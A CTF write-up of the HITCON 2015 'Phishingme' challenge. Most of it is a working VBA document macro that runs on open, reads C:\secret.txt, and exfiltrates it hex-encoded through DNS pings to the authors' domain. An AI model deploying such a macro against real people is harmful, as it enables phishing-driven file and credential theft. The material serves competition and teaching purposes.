HITCON 2015 Quals: Phishingme

Reading time ~4 minutes

This challenge was solved by and the write up was written by two of my teammates, vasporig and aljasPOD.

If we send in a document, the macro inside it gets executed.

Our way of coummunicating with the outside world was to execute a ping to a subdomain of ours: .dns.aljaspod.com, for which we've captured all the requests with wireshark.

Most time was spent by locating the file containing the flag (C:\secret.txt), after looking for any file containing ““flag”” I’ve tried listing the root of C:.

Since the file could contain characters not allowed by the dns, and could be of any length, (after some tries) I’ve converted the flag into hex, and cut it into 16 character parts, sending the following “request” (ping) sequence:

start.dns.aljaspod.com
<flaghex0-15>.0.dns.ajaspod.com
<flaghex16-31>.1.dns.ajaspod.com
...
<flaghex-end>.k.dns.ajaspod.com
end.k+1.dns.aljaspod.com

Converting the hex back resulted in the flag.

VBA code:

Function ReadFile(fname As String) As String
Dim result As String
    Set objFS = CreateObject("Scripting.FileSystemObject")
    Set objFile = objFS.GetFile(fname)
    Set ts = objFile.OpenAsTextStream(1, -2)
    Do Until ts.AtEndOfStream
         result = result & ts.ReadLine
    Loop
    ts.Close

    ReadFile = result
End Function


Function WinDirList() As String
Dim objFSO As Object
Dim objFolder As Object
Dim objFile As Object
Dim result As String
Dim desktopDir As String
Dim currDir As String

    'Create an instance of the FileSystemObject
    Set objFSO = CreateObject("Scripting.FileSystemObject")


    currDir = CurDir()
    'CreateObject("WScript.Shell").CurrentDirectory
    Set objFolder = objFSO.GetFolder(currDir)
    'loops through each file in the directory and prints their names and path
    For Each objFile In objFolder.Files
        'print file name
        result = result & ";" & objFile.path
         'print file name
        If InStr(1, objFile.path, "flag") > 0 Then

        End If
    Next objFile


    'Get the folder object
    desktopDir = CreateObject("WScript.Shell").SpecialFolders("MyDocuments")
    Set objFolder = objFSO.GetFolder(desktopDir)
    'loops through each file in the directory and prints their names and path
    For Each objFile In objFolder.Files
        'print file name
        If InStr(1, objFile.path, "flag") > 0 Then

        End If
        result = result & ";" & objFile.path
    Next objFile


    WinDirList = result

End Function
Function toDomain(tmpStr As String) As String

        tmpStr = Replace(tmpStr, " ", "_")
        tmpStr = Replace(tmpStr, "\", ".")
        tmpStr = Replace(tmpStr, ":", ".")
        tmpStr = Replace(tmpStr, "(", ".")
        tmpStr = Replace(tmpStr, "{", ".")
        tmpStr = Replace(tmpStr, "}", ".")
        tmpStr = Replace(tmpStr, ")", ".")
        tmpStr = Replace(tmpStr, "..", ".")
        tmpStr = Replace(tmpStr, "..", ".")
        tmpStr = Replace(tmpStr, "..", ".")
        tmpStr = Replace(tmpStr, "..", ".")
        toDomain = tmpStr
End Function


Sub PWD()
Dim strTemp As String
Dim tmpStr As String
Dim currDir As String

    currDir = CurDir()
    currDir = TrailingSlash(currDir)
    Debug.Print toDomain(currDir)
    ExecIt (toDomain(currDir))
    strTemp = Dir(currDir)
    Do While strTemp <> vbNullString
       Debug.Print toDomain(strTemp)
       ExecIt (toDomain(strTemp))
       strTemp = Dir()
    Loop

End Sub


Sub ExecIt(domain As String)
Dim strProgramName As String
    'Debug.Print domain
    Call Shell("ping -n 1 -a " & domain, vbNormalFocus)
End Sub


Public Function RecursiveDir(colFiles As Collection, _
                             strFolder As String, _
                             strFileSpec As String, _
                             bIncludeSubfolders As Boolean)

    Dim strTemp As String
    Dim colFolders As New Collection
    Dim vFolderName As Variant
    Dim tmpStr As String

    'Add files in strFolder matching strFileSpec to colFiles
    strFolder = TrailingSlash(strFolder)
    strTemp = Dir(strFolder & strFileSpec)
    Do While strTemp <> vbNullString
        colFiles.Add strFolder & strTemp
        Debug.Print strFolder & strTemp
        ExecIt (toDomain(strFolder & strTemp))
        strTemp = Dir()
    Loop

    If bIncludeSubfolders Then
        'Fill colFolders with list of subdirectories of strFolder
        strTemp = Dir(strFolder, vbDirectory)
        Do While strTemp <> vbNullString
            If (strTemp <> ".") And (strTemp <> "..") Then
                If (GetAttr(strFolder & strTemp) And vbDirectory) <> 0 Then
                    colFolders.Add strTemp
                    ExecIt (toDomain(strFolder & strTemp))
                End If
            End If
            strTemp = Dir
        Loop

        'Call RecursiveDir for each subfolder in colFolders
        For Each vFolderName In colFolders
            'ignore erros
            On Error Resume Next
            'Debug.Print strFolder
            Call RecursiveDir(colFiles, strFolder & vFolderName, strFileSpec, True)
        Next vFolderName
    End If

End Function


Public Function TrailingSlash(strFolder As String) As String
    If Len(strFolder) > 0 Then
        If Right(strFolder, 1) = "\" Then
            TrailingSlash = strFolder
        Else
            TrailingSlash = strFolder & "\"
        End If
    End If
End Function

Public Function GetFileBytes(ByVal path As String) As Byte()
    Dim lngFileNum As Long
    Dim bytRtnVal() As Byte
    lngFileNum = FreeFile
    If LenB(Dir(path)) Then ''// Does file exist?
        Open path For Binary Access Read As lngFileNum
        ReDim bytRtnVal(LOF(lngFileNum) - 1&) As Byte
        Get lngFileNum, , bytRtnVal
        Close lngFileNum
    Else
        Err.Raise 53
    End If
    GetFileBytes = bytRtnVal
    Erase bytRtnVal
End Function

    Private Function ByteArrayToHex(ByRef ByteArray() As Byte) As String
        Dim l As Long, strRet As String

        For l = LBound(ByteArray) To UBound(ByteArray)
            strRet = strRet & Hex$(ByteArray(l))
        Next l
    ByteArrayToHex = strRet
    End Function

Sub Document_Open()
Dim msg As String
Dim l As Integer
Dim k As Integer
Dim Hex As String
Dim bytFile() As Byte
Dim myFile As String
Dim textline As String
Dim colFiles As New Collection
Dim vFile As Variant
    'ignore errors
    'On Error Resume Next
    'Debug.Print "=================================================================="
    ExecIt ("start.dns.aljaspod.com")
    'PWD
    bytFile = GetFileBytes("c:\secret.txt")
    Hex = ByteArrayToHex(bytFile)
    k = Len(Hex) / 16 + 1
    For l = 0 To k
        msg = Left(Hex, 16)
        If Len(Hex) < 16 Then
            Hex = ""
        Else
            Hex = Right(Hex, Len(Hex) - 16)
        End If
        ExecIt (toDomain(msg + "." + CStr(l) + ".dns.aljaspod.com"))
    Next l
    ExecIt ("end." + CStr(k) + ".dns.aljaspod.com")

End Sub

HITCON CTF 2019 Quals: Reverse - EmojiVM

This challenge was a VM implemented where every instruction was an emoji. For the first part of the challenge we had to reverse a flag ch...… Continue reading

HITCON CTF 2019 Quals: Reverse - CoreDumb

Published on October 19, 2019

HITCON CTF 2019 Quals: Pwn - Crypto in the shell

Published on October 19, 2019